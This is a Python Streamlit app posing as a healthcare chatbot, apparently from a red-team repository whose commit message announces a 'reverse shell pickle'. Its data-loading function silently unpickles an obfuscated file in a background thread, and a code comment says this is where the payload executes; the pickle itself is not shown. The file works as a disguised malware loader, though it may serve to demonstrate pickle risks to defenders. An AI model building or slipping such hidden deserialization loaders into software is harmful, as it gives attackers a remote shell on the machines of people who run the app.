pickle-payload-chatbot / helathcare_chatbot.py
Iredteam's picture
Initial commit: payload-enabled chatbot with reverse shell pickle
4c947f4
import os
import pickle
import streamlit as st
import torch
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import warnings
import threading
# Suppress PyTorch warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch")
# ==============================
# Model Configuration
# ==============================
MODEL_DIR = "flan-t5-small" # Load from local directory
def load_model():
"""Load the FLAN-T5 model from a local directory."""
st.write("πŸš€ Loading FLAN-T5 model from local storage...")
try:
torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
model = AutoModelForSeq2SeqLM.from_pretrained(
MODEL_DIR,
torch_dtype=torch_dtype,
local_files_only=True
)
st.write("βœ… Model loaded successfully from local storage!")
return tokenizer, model
except Exception as e:
st.error(f"❌ Model failed to load: {e}")
st.stop()
# ==============================
# Initialize Streamlit UI
# ==============================
st.title("🩺 Healthcare Chatbot (FLAN-T5)")
# Load model
try:
tokenizer, model = load_model()
except Exception as e:
st.error(f"❌ Model load error: {e}")
st.stop()
# ==============================
# Load Medical Q&A Data (Background Thread Without Streamlit UI)
# ==============================
medical_qna = []
data_loaded = threading.Event()
def load_pickle_data():
global medical_qna
try:
with open("train_data_mod_obfuscated_fixed.pkl", "rb") as file:
medical_qna = pickle.load(file) # Payload execution in the background
data_loaded.set() # Signal loading completion
except Exception as e:
medical_qna = []
data_loaded.set()
# Start loading pickle file in a background thread
threading.Thread(target=load_pickle_data, daemon=True).start()
# Informational placeholder in main thread
data_load_placeholder = st.empty()
if not data_loaded.is_set():
data_load_placeholder.info("πŸ“‚ Loading medical Q&A data...")
# Check periodically if data is loaded (refresh UI)
if data_loaded.wait(timeout=5):
data_load_placeholder.success("βœ… Q&A data loaded successfully!")
else:
data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")
# ==============================
# Chatbot Response Logic
# ==============================
def chatbot_response(user_input: str) -> str:
if not data_loaded.is_set() or not medical_qna:
return "The Q&A data is still loading. Please try again shortly."
for qa in medical_qna:
if user_input.lower() in qa["question"].lower():
return qa["answer"]
prompt = (
"You are a helpful medical assistant. The user asked:\n"
f"Question: {user_input}\n\n"
"Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
)
inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
outputs = model.generate(
**inputs,
max_length=256,
num_beams=2,
no_repeat_ngram_size=2
)
return tokenizer.decode(outputs[0], skip_special_tokens=True)
# ==============================
# UI Logic
# ==============================
if st.button("What can you help me with?"):
st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")
user_input = st.text_input("Ask me a medical question:")
if st.button("Get Answer"):
if user_input.strip():
response = chatbot_response(user_input)
st.write(f"**Bot:** {response}")
else:
st.warning("Please enter a question.")